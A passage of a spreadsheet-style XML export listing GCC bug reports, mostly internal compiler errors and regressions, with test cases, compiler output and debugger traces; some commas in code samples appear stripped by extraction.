u8 *
void *
unsigned int
pretmp.191_160 = D.41953_14 + 2
net/ipv6/ndisc.c:199:12: internal compiler error: verify_stmts failed
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
This might be related to bug 42749 (similar ICE but preceded by a different error message and happens on a different architecture (x86_32 the code compiles on x86_64)).</t>
  </si>
  <si>
    <t>GCC-30302</t>
  </si>
  <si>
    <t>[4.2 regression] ICE with invalid member in anonymous struct</t>
  </si>
  <si>
    <t>The following invalid code snippet triggers an ICE since GCC 3.0:
==================================
struct A
{
  struct { static int i }
  void foo() { i }
}
==================================
bug.cc:3: error: 'int A::::i' invalid an anonymous union can only have non-static data members
bug.cc: In member function 'void A::foo()':
bug.cc:4: internal compiler error: Segmentation fault
Please submit a full bug report [etc.]</t>
  </si>
  <si>
    <t>GCC-6581</t>
  </si>
  <si>
    <t>gcj -O2 ICEs in fixup_abnormal_edges</t>
  </si>
  <si>
    <t>This is perhaps a duplicate of 4571 but that hasn't gotten any attention.  Three separate SPECjbb Java source files generate ICE messages very similar to the following:
spec/jbb/NewOrderTransaction.java:461: Internal compiler error in fixup_abnormal_edges at reload1.c:9524
Please submit a full bug report ...
Adam King has also reported this failure in a different context (http://gcc.gnu.org/ml/gcc/2002-04/msg00830.html)
This appears to be caused by a float to double conversion that is then eliminated.  This leaves an empty block with an exception flow edge.
I believe this is technically a regression.  However I can't honestly claim the 3.0.x overall did a credible job of compiling SPECjbb due to other issues.
This problem is X86 specific since it's triggered during the pass that deals with the fp stacked registers.
I'm classifying is crtical since it seems likely to me that it will make gcj significantly less useful on the most common platforms.  Thus we should at least think about whether it's worth addressing for 3.1.
Some details from debugging this:
***Dies processing line:
  orderScreen.putDollars(customerBalance 14 3 10)  // Fails here!
CustomerBalance is float parameter is double.
***RTL from .27.sched2 file:
 Start of basic block 33 registers live: 0 [ax] 4 [si] 5 [di] 6 [bp] 7 [sp] 16 [] 20 [frame]
(note 256 158 160 [bb 33] NOTE_INSN_BASIC_BLOCK)
(insn 160 256 257 (set (reg:SF 8 st(0) [92])
        (mem/s:SF (plus:SI (reg/v/f:SI 4 esi [58])
                (const_int 28 [0x1c])) [30 .customerBalance+0 S4 A32])) 90 {*movsf_1} (nil)
    (expr_list:REG_EH_REGION (const_int 1 [0x1])
        (nil)))
 End of basic block 33 registers live:
 0 [ax] 4 [si] 5 [di] 6 [bp] 7 [sp] 8 [st] 16 [] 20 [frame]
 Start of basic block 34 registers live: 0 [ax] 4 [si] 5 [di] 6 [bp] 7 [sp] 8 [st] 16 [] 20 [frame]
(note 257 160 162 [bb 34] NOTE_INSN_BASIC_BLOCK)
(insn 162 257 258 (set (reg:DF 8 st(0) [91])
        (float_extend:DF (reg:SF 8 st(0) [92]))) 133 {*extendsfdf2_1} (nil)
    (expr_list:REG_EH_REGION (const_int 1 [0x1])
        (nil)))
 End of basic block 34 registers live:
 0 [ax] 4 [si] 5 [di] 6 [bp] 7 [sp] 8 [st] 16 [] 20 [frame]
***Stack trace at failure:
#0  fixup_abnormal_edges () at ../../gcc/gcc/reload1.c:9514
#1  0x0822ca95 in convert_regs (file=0x8594180) at ../../gcc/gcc/reg-stack.c:2857
#2  0x0822937a in reg_to_stack (first=0x40635a40 file=0x8594180)
    at ../../gcc/gcc/reg-stack.c:500
#3  0x081b100b in rest_of_compilation (decl=0x40199850)
    at ../../gcc/gcc/toplev.c:3377
***Offending bb's at failure:
(gdb) call debug_bb(bb)
 Basic block 34 loop depth 0 count 0
 Predecessors:  33 [50.0%]  (fallthru)
 Registers live at start: 0 [ax] 4 [si] 5 [di] 6 [bp] 7 [sp] 8 [st] 16 [] 20 [frame]
(note 257 160 258 [bb 34] NOTE_INSN_BASIC_BLOCK)
 Registers live at end: 0 [ax] 4 [si] 5 [di] 6 [bp] 7 [sp] 8 [st] 16 [] 20 [frame]
 Successors:  35 [50.0%]  (fallthru) 39 [50.0%]  (abeh)
(gdb) call debug_bb_n(33)
 Basic block 33 loop depth 0 count 0
 Predecessors:  32 [50.0%]  (fallthru)
 Registers live at start: 0 [ax] 4 [si] 5 [di] 6 [bp] 7 [sp] 16 [] 20 [frame]
(note 256 158 160 [bb 33] NOTE_INSN_BASIC_BLOCK)
(insn 160 256 257 (set (reg:SF 8 st(0))
        (mem/s:SF (plus:SI (reg/v/f:SI 4 esi [58])
                (const_int 28 [0x1c])) [30 .customerBalance+0 S4 A32])) 90 {*movsf_1} (nil)
    (expr_list:REG_EH_REGION (const_int 1 [0x1])
        (nil)))
 Registers live at end: 0 [ax] 4 [si] 5 [di] 6 [bp] 7 [sp] 8 [st] 16 [] 20 [frame]
 Successors:  34 [50.0%]  (fallthru) 39 [50.0%]  (abeh)
***Note that block 34 is now empty.
The float_extend was apparently eliminated in the conversion to the X86
floating point register stack.  But I guess it still thinks it has an exception
edge.  This causes fixup_abnormal_edges() to fail since it can't find the insn
responsible for the edge.
Release:
unknown
Environment:
Linux/X86
How-To-Repeat:
Try to build SPECjbb with 3.1.  I wasn't easily able to extract a small test case from SPECjbb.  And unfortunately SPECjbb is not open source.  Adam King may have a better one.  The test case in 4571 no longer seems to fail and thus can't be used.</t>
  </si>
  <si>
    <t>hans_boehm</t>
  </si>
  <si>
    <t>GCC-26821</t>
  </si>
  <si>
    <t>[4.1 Regression] ice in varasm.c with certain flags</t>
  </si>
  <si>
    <t>The following code ices with the given options:
$ cat icey.f
      SUBROUTINE IRCGS2(NCQAQBQCRTRMS)
      IMPLICIT DOUBLE PRECISION(A-HO-Z)
      DIMENSION QA(NC) QB(NC) QC(NC) QCM(6000) QBM(6000) QAM(6000)
     * RTRMS(NC)
      IF (NC .GT. 6000) NC = 6000
      DO 30 I = 1NC
         RTRMSI = RTRMS(I)
         QAM(I) = QA(I) / RTRMSI
         QBM(I) = QB(I) / RTRMSI
         QCM(I) = QC(I) / RTRMSI
   30 CONTINUE
      RETURN
      END
$ gfc -c -march=pentium4 -O -ffast-math -ftree-vectorize  icey.f
icey.f:12: internal compiler error: in output_constant_pool_2 at varasm.c:3339
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Adding -fno-automatic and there is no ice.
$ gfc -c -march=pentium4 -O -ffast-math -ftree-vectorize -fno-automatic  icey.f
$
Using -march=k8 instead of -march=pentium4 also ices.
Getting rid of the -march= and the ice goes away.
$ gfc -v Using built-in specs.
Target: i686-pc-linux-gnu
Configured with: ../main/configure --prefix=/home/jerry/gcc/usr --enable-languages=cfortran --disable-libmudflap
Thread model: posix
gcc version 4.2.0 20060323 (experimental)</t>
  </si>
  <si>
    <t>GCC-25835</t>
  </si>
  <si>
    <t>Segfault or Bad Address error on unformatted sequential READ</t>
  </si>
  <si>
    <t>This PR is branched from PR25697 and appears to be a problem in fd_alloc related to setting s-&gt;active = 0 when it should not for buffer sizes greater than 8192 bytes.  The following test case appears to not fail when the data array is 2044 elements ans gives a runtime when 2045.  This is the 8192 byte crossover point (2044 x 4 + 16 for record markers)
The test case also involves EOF conditions.
      integer data(2045)
      do i = 12045
        data(i)=-2
      enddo
      open(unit=11status='scratch'form='unformatted')
       write(11)data
       read(11end=        1000 )data
       call abort()
 1000  continue
       print * First read done.
       backspace 11
       backspace 11
       read(11end=        1001 )data
       print * Second read normal exit.
 1001  continue
       read(11end=        1002 )data
       call abort()
 1002  continue
       print * Third read done.
       close(11)
       end</t>
  </si>
  <si>
    <t>GCC-81564</t>
  </si>
  <si>
    <t>ICE in group_case_labels_stmt()</t>
  </si>
  <si>
    <t>Yet another fallout from the switch changes.
bergner@pike:~/gcc/BUGS/$ cat bug.i
struct a {
    int b
    int c
}
void
foo (void)
{
  struct a *e
  switch (e-&gt;c)
  {
    case 7:
    case 3:
      if (__builtin_expect(!0 0))
	__builtin_unreachable()
  }
}
bergner@pike:~/gcc/BUGS/$ /home/bergner/gcc/build/gcc-fsf-mainline-debug/gcc/xgcc -B/home/bergner/gcc/build/gcc-fsf-mainline-debug/gcc -O2 -S bug.i
during GIMPLE pass: cfg
bug.i: In function â€˜fooâ€™:
bug.i:7:1: internal compiler error: Segmentation fault
 foo (void)
 ^~~
0x10e70e77 crash_signal
	/home/bergner/gcc/gcc-fsf-mainline-base/gcc/toplev.c:338
0x10ee1508 group_case_labels_stmt(gswitch*)
	/home/bergner/gcc/gcc-fsf-mainline-base/gcc/tree-cfg.c:1740
0x10edf98b end_recording_case_labels()
	/home/bergner/gcc/gcc-fsf-mainline-base/gcc/tree-cfg.c:1255
0x10f0b9af cleanup_tree_cfg_1
	/home/bergner/gcc/gcc-fsf-mainline-base/gcc/tree-cfgcleanup.c:748
0x10f0bdab cleanup_tree_cfg_noloop
	/home/bergner/gcc/gcc-fsf-mainline-base/gcc/tree-cfgcleanup.c:843
0x10f0bfcf cleanup_tree_cfg()
	/home/bergner/gcc/gcc-fsf-mainline-base/gcc/tree-cfgcleanup.c:899
0x10edcbcf execute_build_cfg
	/home/bergner/gcc/gcc-fsf-mainline-base/gcc/tree-cfg.c:405
0x10edcca7 execute
	/home/bergner/gcc/gcc-fsf-mainline-base/gcc/tree-cfg.c:434
Please submit a full bug report
with preprocessed source if appropriate.
Program received signal SIGSEGV Segmentation fault.
0x0000000010ee1508 in group_case_labels_stmt (stmt=0x3fffb59e7940)
    at /home/bergner/gcc/gcc-fsf-mainline-pr72804-base/gcc/tree-cfg.c:1740
1740	      if (EDGE_COUNT (base_bb-&gt;succs) == 0
(gdb) p base_bb
$2 = (basic_block) 0x0
(gdb) p base_case
$1 = (tree) 0x3fffb5a80000
(gdb) ptree base_case
 &lt;case_label_expr 0x3fffb5a80000
    type &lt;void_type 0x3fffb58d0f18 void VOID
        align 8 symtab 0 alias set -1 canonical type 0x3fffb58d0f18
        pointer_to_this &gt;
    side-effects
    arg 0  constant 7&gt;
    arg 2 
        ignored VOID file (null) line 0 col 0
        align 1 context &gt;
    bug.i:12:5 start: bug.i:12:5 finish: bug.i:12:8&gt;
(gdb) p CASE_LABEL(base_case)
$3 = (tree) 0x3fffb5a50380
(gdb) ptree $3
 &lt;label_decl 0x3fffb5a50380 L.5
    type &lt;void_type 0x3fffb58d0f18 void VOID
        align 8 symtab 0 alias set -1 canonical type 0x3fffb58d0f18
        pointer_to_this &gt;
    ignored VOID file (null) line 0 col 0
    align 1 context &gt;
(gdb) pcfg
 basic block 2 loop depth 0
  pred:       ENTRY
  succ:       5
 basic block 5 loop depth 0
  pred:       2
  succ:       EXIT
(gdb) pbb 2
 basic block 2 loop depth 0
  pred:       ENTRY
_1 = e-&gt;c
switch (_1)  [INV] [count: INV] case 3:  case 7: &gt;
  succ:       5
(gdb) pbb 5
 basic block 5 loop depth 0
  pred:       2
 [0.00%] [count: INV]:
return
  succ:       EXIT
So it seems the block that the case labels point to has been deleted which is confirmed in the bug.i.011t.cfg dump file:
Removing basic block 3
 basic block 3 loop depth 0
  pred:      
 [0.00%] [count: INV]:
  succ:       4
Removing basic block 4
 basic block 4 loop depth 0
  pred:       2
 [0.00%] [count: INV]:
__builtin_unreachable ()
  succ:      
EMERGENCY DUMP:
foo ()
{
  struct a * eD.2678
   basic block 2 loop depth 0 freq 0 maybe hot
    prev block 0 next block 5 flags: (NEW REACHABLE)
    pred:       ENTRY (FALLTHRU)
  _1 = eD.2678-&gt;cD.2674
  switch (_1)  [INV] [count: INV] case 3:  case 7: &gt;
    succ:       5
   basic block 5 loop depth 0 freq 0 maybe hot
    prev block 2 next block 1 flags: (NEW REACHABLE)
    pred:       2
 [0.00%] [count: INV]:
  return
    succ:       EXIT
}
In this base we should probably discard these case statements similarly to how we discard cases that have the same label as the default case.</t>
  </si>
  <si>
    <t>GCC-7053</t>
  </si>
  <si>
    <t>[3.3 Regression] ICE when declaring a function already defined as a friend method of a template class</t>
  </si>
  <si>
    <t>gcc does not tolerate a redeclaration of a friend method
oustside of its original class when the parameter is
template dependent.
g++-3.1 -v -save-temps ICE.cc                                                                                                                   12:55
Reading specs from /usr/lib/gcc-lib/i386-linux/3.1.1/specs
Configured with: /mnt/data/gcc-3.1/gcc-3.1-3.1.1ds1/src/configure -v --enable-languages=cc++javaf77protoobjcada --prefix=/usr --mandir=/usr/share/man --infodir=/usr/share/info --with-gxx-include-dir=/usr/include/g++-v3-3.1 --enable-shared --with-system-zlib --enable-long-long --enable-nls --without-included-gettext --enable-clocale=gnu --enable-threads=posix --enable-java-gc=boehm --enable-objc-gc i386-linux
Thread model: posix
gcc version 3.1.1 20020606 (Debian prerelease)
 /usr/lib/gcc-lib/i386-linux/3.1.1/cpp0 -lang-c++ -D__GNUG__=3 -D__DEPRECATED -D__EXCEPTIONS -D__GXX_ABI_VERSION=100 -v -D__GNUC__=3 -D__GNUC_MINOR__=1 -D__GNUC_PATCHLEVEL__=1 -D__ELF__ -Dunix -D__gnu_linux__ -Dlinux -D__ELF__ -D__unix__ -D__gnu_linux__ -D__linux__ -D__unix -D__linux -Asystem=posix -D__NO_INLINE__ -D__STDC_HOSTED__=1 -D_GNU_SOURCE -Acpu=i386 -Amachine=i386 -Di386 -D__i386 -D__i386__ -D__tune_i386__ ICE.cc ICE.ii
GNU CPP version 3.1.1 20020606 (Debian prerelease) (cpplib) (i386 Linux/ELF)
ignoring nonexistent directory /usr/i386-linux/include
#include ... search starts here:
#include  search starts here:
 /usr/include/g++-v3-3.1
 /usr/include/g++-v3-3.1/i386-linux
 /usr/include/g++-v3-3.1/backward
 /usr/local/include
 /usr/lib/gcc-lib/i386-linux/3.1.1/include
 /usr/include
End of search list.
 /usr/lib/gcc-lib/i386-linux/3.1.1/cc1plus -fpreprocessed ICE.ii -quiet -dumpbase ICE.cc -version -o ICE.s
GNU CPP version 3.1.1 20020606 (Debian prerelease) (cpplib) (i386 Linux/ELF)
GNU C++ version 3.1.1 20020606 (Debian prerelease) (i386-linux)
        compiled by GNU C version 3.1.1 20020606 (Debian prerelease).
ICE.cc: In instantiation of `void bar(A)':
ICE.cc:13:   instantiated from here
ICE.cc:4: Internal compiler error in regenerate_decl_from_template at cp/pt.c:
   9779
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Release:
3.1.1 20020606 (Debian prerelease) (Debian testing/unstable)
Environment:
System: Linux ouarzazate 2.4.17 #1 Sun Mar 10 19:25:30 CET 2002 i686 unknown
Architecture: i686
host: i386-pc-linux-gnu
build: i386-pc-linux-gnu
target: i386-pc-linux-gnu
configured with: /mnt/data/gcc-3.1/gcc-3.1-3.1.1ds1/src/configure -v --enable-languages=cc++javaf77protoobjcada --prefix=/usr --mandir=/usr/share/man --infodir=/usr/share/info --with-gxx-include-dir=/usr/include/g++-v3-3.1 --enable-shared --with-system-zlib --enable-long-long --enable-nls --without-included-gettext --enable-clocale=gnu --enable-threads=posix --enable-java-gc=boehm --enable-objc-gc i386-linux
How-To-Repeat:
template 
struct A
{
  friend void bar(A a) {}
}
void bar(A)
int main()
{
  A a
  bar(a)
}</t>
  </si>
  <si>
    <t>nicolas.tisserand</t>
  </si>
  <si>
    <t>GCC-39954</t>
  </si>
  <si>
    <t>[4.5 Regression] Revision 146817 caused unaligned access in gcc.dg/torture/pr26565.c</t>
  </si>
  <si>
    <t>On Linux/ia64 revision 146820 gave
Apr 26 20:44:03 gnu-12 kernel: pr26565.exe(23460): unaligned access to 0x6000000000000e31 ip=0x40000000000006d0
Apr 26 20:44:03 gnu-12 kernel: pr26565.exe(23472): unaligned access to 0x6000000000000e71 ip=0x40000000000006d0
Apr 26 20:44:03 gnu-12 kernel: pr26565.exe(23484): unaligned access to 0x6000000000000e71 ip=0x40000000000006d0
Apr 26 20:44:03 gnu-12 kernel: pr26565.exe(23503): unaligned access to 0x6000000000000e71 ip=0x40000000000006d0
Apr 26 20:44:03 gnu-12 kernel: pr26565.exe(23515): unaligned access to 0x6000000000000e51 ip=0x40000000000006d0
Revision 146803 is OK.</t>
  </si>
  <si>
    <t>GCC-24368</t>
  </si>
  <si>
    <t>[3.4 Regression] -Wshadow gets confused by built-ins</t>
  </si>
  <si>
    <t>Consider the following example:
#include 
// Okay if we do this:
//using std::floor
double f(double d)
{
    // If we do this however GCC says: shadow.C:7: warning:
    // shadowing built-in function `double std::floor(double)'
    using std::floor
    return floor(d)
}
As indicated in the comments the example compiles without warnings when using -Wshadow IFF 'using std::floor' is at file scope. However if the using declaration is moved inside of a function GCC complains about shadowing a built-in.
-------
cnewbold@sarge:~/playpen$ g++-3.4 -v
Reading specs from /usr/lib/gcc/i486-linux/3.4.4/specs
Configured with: ../src/configure -v --enable-languages=cc++javaf77pascalobjcadatreelang --prefix=/usr --libexecdir=/usr/lib --with-gxx-include-dir=/usr/include/c++/3.4 --enable-shared --with-system-zlib --enable-nls --without-included-gettext --program-suffix=-3.4 --enable-__cxa_atexit --enable-libstdcxx-allocator=mt --enable-clocale=gnu --enable-libstdcxx-debug --enable-java-gc=boehm --enable-java-awt=gtk --disable-werror i486-linux
Thread model: posix
gcc version 3.4.4 20050314 (prerelease) (Debian 3.4.3-13)</t>
  </si>
  <si>
    <t>cnewbold</t>
  </si>
  <si>
    <t>GCC-27858</t>
  </si>
  <si>
    <t>[4.2 Regression] ICE in spill_failure at reload1.c:1911while bootstrapping 4.2 on alpha</t>
  </si>
  <si>
    <t>I get the following ICE when bootstrapping gcc 4.2 20060530 on alpha.  20060508 worked fine.  I'm running delta right now and will send a test case when it's done.
/build/buildd/gcc-snapshot-20060530/build/./gcc/xgcc -B/build/buildd/gcc-snapshot-20060530/build/./gcc/ -B/usr/lib/gcc-snapshot/alpha-linux-gnu/bin/ -B/usr/lib/gcc-snapshot/alpha-linux-gnu/lib/ -isystem /usr/lib/gcc-snapshot/alpha-linux-gnu/include -isystem /usr/lib/gcc-snapshot/alpha-linux-gnu/sys-include -DHAVE_CONFIG_H -I. -I../../../../../../src/libjava/classpath/native/fdlibm -I../../include -O2 -g -O2 -mieee -MT strtod.lo -MD -MP -MF .deps/strtod.Tpo -c ../../../../../../src/libjava/classpath/native/fdlibm/strtod.c  -fPIC -DPIC -o .libs/strtod.o
../../../../../../src/libjava/classpath/native/fdlibm/strtod.c: In function '_Jv_strtod_r':
../../../../../../src/libjava/classpath/native/fdlibm/strtod.c:718: error: unable to find a register to spill in class 'FLOAT_REGS'
../../../../../../src/libjava/classpath/native/fdlibm/strtod.c:718: error: this is the insn:
(insn 1014 1010 2389 99 ../../../../../../src/libjava/classpath/native/fdlibm/strtod.c:345 (set (reg:DF 34 $f2 [orig:288 prephitmp.60 ] [288])
        (subreg:DF (const_int 9218868437227405312 [0x7ff0000000000000]) 0)) 235 {*movdf_nofix} (nil)
    (expr_list:REG_DEAD (reg:DI 875)
        (nil)))
../../../../../../src/libjava/classpath/native/fdlibm/strtod.c:718: internal compiler error: in spill_failure at reload1.c:1911
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make[7]: *** [strtod.lo] Error 1</t>
  </si>
  <si>
    <t>GCC-65432</t>
  </si>
  <si>
    <t>[5 Regression] Invalid read of size 1: ipa_icf::sem_item_optimizer::merge_classes(unsigned int) (ipa-icf.c:2958)</t>
  </si>
  <si>
    <t>Running the testsuite on ppc64le with an --enable-checking=valgrind
compiler shows many instances of:
==94166== Invalid read of size 1
==94166==    at 0x40980F8: strlen (in /usr/lib64/valgrind/vgpreload_memcheck-ppc64le-linux.so)
==94166==    by 0x4626503: vfprintf@@GLIBC_2.17 (in /usr/lib64/libc-2.20.so)
==94166==    by 0x4631003: fprintf@@GLIBC_2.17 (in /usr/lib64/libc-2.20.so)
==94166==    by 0x10CF34B3: ipa_icf::sem_item_optimizer::merge_classes(unsigned int) (ipa-icf.c:2958)
==94166==    by 0x10CF962B: ipa_icf::sem_item_optimizer::execute() (ipa-icf.c:2236)
==94166==    by 0x10CFC8DF: ipa_icf_driver (ipa-icf.c:3060)
==94166==    by 0x10CFC8DF: ipa_icf::pass_ipa_icf::execute(function*) (ipa-icf.c:3107)
==94166==    by 0x1068FBC7: execute_one_pass(opt_pass*) (passes.c:2328)
==94166==    by 0x10690B53: execute_ipa_pass_list(opt_pass*) (passes.c:2727)
==94166==    by 0x1038D2DF: ipa_passes (cgraphunit.c:2207)
==94166==    by 0x1038D2DF: symbol_table::compile() (cgraphunit.c:2295)
==94166==    by 0x1038ED47: symbol_table::finalize_compilation_unit() (cgraphunit.c:2444)
==94166==    by 0x101A31CB: cp_write_global_declarations() (decl2.c:4754)
==94166==    by 0x1076894F: compile_file() (toplev.c:608)
==94166==  Address 0x701ee20 is 0 bytes inside a block of size 38 free'd
==94166==    at 0x4095394: free (in /usr/lib64/valgrind/vgpreload_memcheck-ppc64le-linux.so)
==94166==    by 0x10243CAF: cxx_printable_name_internal(tree_node* int bool) (tree.c:2026)
==94166==    by 0x10374D23: symtab_node::name() const (symtab.c:479)
==94166==    by 0x10CF3497: name (ipa-icf.h:177)
==94166==    by 0x10CF3497: ipa_icf::sem_item_optimizer::merge_classes(unsigned int) (ipa-icf.c:2958)
==94166==    by 0x10CF962B: ipa_icf::sem_item_optimizer::execute() (ipa-icf.c:2236)
==94166==    by 0x10CFC8DF: ipa_icf_driver (ipa-icf.c:3060)
==94166==    by 0x10CFC8DF: ipa_icf::pass_ipa_icf::execute(function*) (ipa-icf.c:3107)
==94166==    by 0x1068FBC7: execute_one_pass(opt_pass*) (passes.c:2328)
==94166==    by 0x10690B53: execute_ipa_pass_list(opt_pass*) (passes.c:2727)
==94166==    by 0x1038D2DF: ipa_passes (cgraphunit.c:2207)
==94166==    by 0x1038D2DF: symbol_table::compile() (cgraphunit.c:2295)
==94166==    by 0x1038ED47: symbol_table::finalize_compilation_unit() (cgraphunit.c:2444)
==94166==    by 0x101A31CB: cp_write_global_declarations() (decl2.c:4754)
==94166==    by 0x1076894F: compile_file() (toplev.c:608)</t>
  </si>
  <si>
    <t>GCC-61011</t>
  </si>
  <si>
    <t>libstdc++-v3 should be target-libstdc++-v3 in top level configure</t>
  </si>
  <si>
    <t>When passing --disable-libstdcxx to top level configure the following code is executed:
------------
if test ${ENABLE_LIBSTDCXX} = no  then
  noconfigdirs=$noconfigdirs libstdc++-v3
fi
------------
This does not have the desired effect since make still tries to build the target libstdc++.
The above code should be changed to:
------------
if test ${ENABLE_LIBSTDCXX} = no  then
  noconfigdirs=$noconfigdirs target-libstdc++-v3
fi
------------
Thanks</t>
  </si>
  <si>
    <t>pierre.labastie</t>
  </si>
  <si>
    <t>GCC-61907</t>
  </si>
  <si>
    <t>load of invalid value for 'bool' in trans-array.c trans_array_constructor</t>
  </si>
  <si>
    <t>Compiling many testsuite files with a sanitized gfortran
as in typebound_assignment_6.f03 elemental_subroutine_2.f90 move_alloc_13.f90 where_operator_assign_2.f90 pr43808.f90 and more I get the following
../../gcc-4.9.1/gcc/fortran/trans-array.c:2207:9: runtime error: 
load of value xxx which is not a valid value for type 'bool'
The offending instructions are
2206:  typespec_chararray_ctor = (expr-&gt;ts.u.cl
2207:                              
in trans_array_constructor.</t>
  </si>
  <si>
    <t>GCC-60364</t>
  </si>
  <si>
    <t>[[noreturn]] specified for second declaration but not first doesn't result in a diagnostic</t>
  </si>
  <si>
    <t>Created attachment 32232
testcase.cpp
void func ()
void func [[noreturn]] ()
int main () { }
------------------------------------------------------------------
The above should result in an error since [dcl.attr.noreturn]p1 explicitly says
  &gt; The first declaration of a function shall specify the noreturn
  &gt; attribute if any declaration of that function specifies the noreturn
  &gt; attribute.
Both clang and icc correctly issues a diagnostic when trying to compile the provided snippet.</t>
  </si>
  <si>
    <t>filip.roseen</t>
  </si>
  <si>
    <t>GCC-45438</t>
  </si>
  <si>
    <t>[4.6 Regression] [OOP] ICE with -fcheck=pointer</t>
  </si>
  <si>
    <t>Hello
Trying to debug another issue I have found this ICE trunk at r163595
[sfilippo@localhost bug22]$ gfortran -v
Using built-in specs.
COLLECT_GCC=gfortran
COLLECT_LTO_WRAPPER=/usr/local/gnu46/libexec/gcc/x86_64-unknown-linux-gnu/4.6.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ../gcc/configure --prefix=/usr/local/gnu46 --enable-languages=cc++fortran : (reconfigured) ../gcc/configure --prefix=/usr/local/gnu46 --enable-languages=cc++fortran
Thread model: posix
gcc version 4.6.0 20100827 (experimental) (GCC) 
[sfilippo@localhost bug22]$ gfortran -ggdb -c bug22.f03
[sfilippo@localhost bug22]$ gfortran -ggdb -fcheck=pointer -c bug22.f03
bug22.f03: In function 'base_get_nz_row':
bug22.f03:58:0: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-66957</t>
  </si>
  <si>
    <t>[4.9/5/6 Regression] incorrect is protected within this context error</t>
  </si>
  <si>
    <t>Created attachment 36023
The code which produces the bug
In the attachment you find code which I'm trying to compile with g++.
I have a archlinux system and I have g++ version 5.1.0 from the offical repo of my system.
I'm trying to compile the attached code by invoking 
`g++ classtest.cpp`. 
gcc fires the error:
classtest.cpp: In constructor â€˜DerivedB::DerivedB()â€™:
classtest.cpp:9:5: error: â€˜int BaseClass::xâ€™ is protected
 int BaseClass::x
     ^
classtest.cpp:22:32: error: within this context
         std::cout &lt;&lt; DerivedA::x
                                ^
What I'm trying to achieve is completely legal according to the c++ standard ([class.access.base]/p5 ).
More information discussion and a lot of people who agree that this is indeed a gcc bug can be found in the associated stackoverflow question: http://stackoverflow.com/questions/31389470/g-compilation-error-is-protected-from-within-this-context-while-clang-do</t>
  </si>
  <si>
    <t>dreamcooled</t>
  </si>
  <si>
    <t>GCC-50980</t>
  </si>
  <si>
    <t>arm-rtems multilib not matching for -mfpu=vfp -mfloat-abi=soft</t>
  </si>
  <si>
    <t>This is a regression from 4.6 and older.
GCC Revision: Thu Nov  3 12:25:34 UTC 2011 (revision 180821)
The compiler builds and installs fine.  But a multilib mismatch has crept in.  
This worked in 4.6 and older.  The test program is a minimal main() {}
arm-rtems4.11-gcc -mstructure-size-boundary=8 -mcpu=arm920 -mfpu=vfp \
   -mfloat-abi=soft -O2 -g m.c
Now it gives this error:
/users/joel/test-gcc/install-svn/lib/gcc/arm-rtems4.11/4.7.0/../../../../arm-rtems4.11/bin/ld: error: /tmp/ccNtArTU.o uses VFP instructions whereas a.out does not
Adding -v it is easy to see that it is not using the vfp 
multilib like it was in 4.6.2
4.6.2============================
/opt/rtems-4.11/libexec/gcc/arm-rtems4.11/4.6.2/collect2 -X /opt/rtems-4.11/lib/gcc/arm-rtems4.11/4.6.2/../../../../arm-rtems4.11/lib/vfp/crt0.o -L/opt/rtems-4.11/lib/gcc/arm-rtems4.11/4.6.2/vfp -L/opt/rtems-4.11/lib/gcc/arm-rtems4.11/4.6.2/../../../../arm-rtems4.11/lib/vfp -L/opt/rtems-4.11/lib/gcc/arm-rtems4.11/4.6.2 -L/opt/rtems-4.11/lib/gcc/arm-rtems4.11/4.6.2/../../../../arm-rtems4.11/lib /tmp/ccMcThnp.o -lgcc -lg -lc -lgcc
===============================
4.7-pre===========================
/users/joel/test-gcc/install-svn/libexec/gcc/arm-rtems4.11/4.7.0/collect2 -X /users/joel/test-gcc/install-svn/lib/gcc/arm-rtems4.11/4.7.0/../../../../arm-rtems4.11/lib/crt0.o -L/users/joel/test-gcc/install-svn/lib/gcc/arm-rtems4.11/4.7.0 -L/users/joel/test-gcc/install-svn/lib/gcc/arm-rtems4.11/4.7.0/../../../../arm-rtems4.11/lib /tmp/ccxFgIuB.o -lgcc -lg -lc -lgcc
===============================</t>
  </si>
  <si>
    <t>GCC-43517</t>
  </si>
  <si>
    <t>[4.4 Regression] spurious end-of-file condition when namelist read follows formatted read</t>
  </si>
  <si>
    <t>The following bug exists in all ports. It applies to gfortran 4.4.4 and 4.5. It does not apply to gfortran 4.4.0 4.4.1 4.4.2 4.4.3 or any 4.3 version.
I compile and run the following program:
PROGRAM main
NAMELIST /name/ j
OPEN (10FILE='file.txt'STATUS='OLD'FORM='FORMATTED')
READ (105000) i idum
5000 FORMAT(2I54X) ! This FORMAT is crucial to the bug
PRINT * i = i as expected
READ (10nameEND=999)
STOP
999 PRINT * Spurious end of file condition
END PROGRAM main
The file.txt file contains the following:
999999
 $name
  j=0
 /
The program prints:
 i =       99999 as expected
 Spurious end of file condition</t>
  </si>
  <si>
    <t>GCC-57171</t>
  </si>
  <si>
    <t>I'm using Ubuntu and get this message. I've attached the file from the output.
libtool: compile:  g++ -DPACKAGE_NAME=\libbitcoin\ -DPACKAGE_TARNAME=\libbitcoin\ -DPACKAGE_VERSION=\0.1\ -DPACKAGE_STRING=\libbitcoin 0.1\ -DPACKAGE_BUGREPORT=\genjix@riseup.net\ -DPACKAGE_URL=\\ -DPACKAGE=\libbitcoin\ -DVERSION=\0.1\ -DSTDC_HEADERS=1 -DHAVE_SYS_TYPES_H=1 -DHAVE_SYS_STAT_H=1 -DHAVE_STDLIB_H=1 -DHAVE_STRING_H=1 -DHAVE_MEMORY_H=1 -DHAVE_STRINGS_H=1 -DHAVE_INTTYPES_H=1 -DHAVE_STDINT_H=1 -DHAVE_UNISTD_H=1 -DHAVE_DLFCN_H=1 -DLT_OBJDIR=\.libs/\ -DHAVE_BOOST=/**/ -I. -I./../include -std=gnu++0x -Wall -Wno-unused-parameter -pedantic -pthread -Wextra -fstack-protector-all -ggdb -MT leveldb_blockchain.lo -MD -MP -MF .deps/leveldb_blockchain.Tpo -c blockchain/leveldb/leveldb_blockchain.cpp  -fPIC -DPIC -o .libs/leveldb_blockchain.o
blockchain/leveldb/leveldb_blockchain.cpp: In member function 'void libbitcoin::leveldb_blockchain::do_store(const libbitcoin::message::block&amp; libbitcoin::blockchain::store_block_handler)':
blockchain/leveldb/leveldb_blockchain.cpp:183:54: warning: narrowing conversion of 'depth' from 'int' to 'size_t {aka unsigned int}' inside { } [-Wnarrowing]
'
